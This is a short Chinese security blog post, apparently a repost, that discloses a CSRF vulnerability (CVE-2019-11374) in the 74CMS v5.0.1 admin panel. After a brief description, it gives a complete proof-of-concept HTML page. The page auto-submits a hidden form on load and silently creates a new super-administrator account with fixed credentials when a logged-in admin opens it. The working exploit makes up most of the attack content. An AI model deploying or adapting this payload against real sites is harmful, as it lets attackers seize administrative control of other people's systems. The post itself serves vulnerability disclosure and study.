骑士74CMS v5.0.1后台管理页面存在CSRF漏洞(CVE-2019-11374)

颓废 2019年5月19日09:02:40评论2,433 views字数 627阅读2分5秒阅读模式
摘要

登陆后台管理页面,可以添加管理员 
添加信息
抓取数据包


二、漏洞概述

登陆后台管理页面,可以添加管理员 

骑士74CMS v5.0.1后台管理页面存在CSRF漏洞(CVE-2019-11374)

添加信息

骑士74CMS v5.0.1后台管理页面存在CSRF漏洞(CVE-2019-11374)

抓取数据包

骑士74CMS v5.0.1后台管理页面存在CSRF漏洞(CVE-2019-11374)

管理员登陆后台管理界面后
点击hacker发来的如下链接
即可创建一个新的超级管理员用户 
骑士74CMS v5.0.1后台管理页面存在CSRF漏洞(CVE-2019-11374)

附上poc

<!DOCTYPE html> <html>   <head>   <title> CSRF </title>   <script type="text/javascript">     function exec1(){       document.getElementById('form1').submit();     }   </script>   </head>   <body onload="exec1();">     <form id="form1" action="https://www.0dayhack.com/index.php?m=Admin&c=admin&a=add" method="POST">       <input type="hidden" name="username" value="admin688" />   <input type="hidden" name="email" value="[email protected]" />       <input type="hidden" name="password" value="admin688" />       <input type="hidden" name="repassword" value="admin688" />     <input type="hidden" name="role_id" value="1" />     </form>   </body> </html>

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日09:02:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   骑士74CMS v5.0.1后台管理页面存在CSRF漏洞(CVE-2019-11374)http://cn-sec.com/archives/68062.html

发表评论

匿名网友 填写信息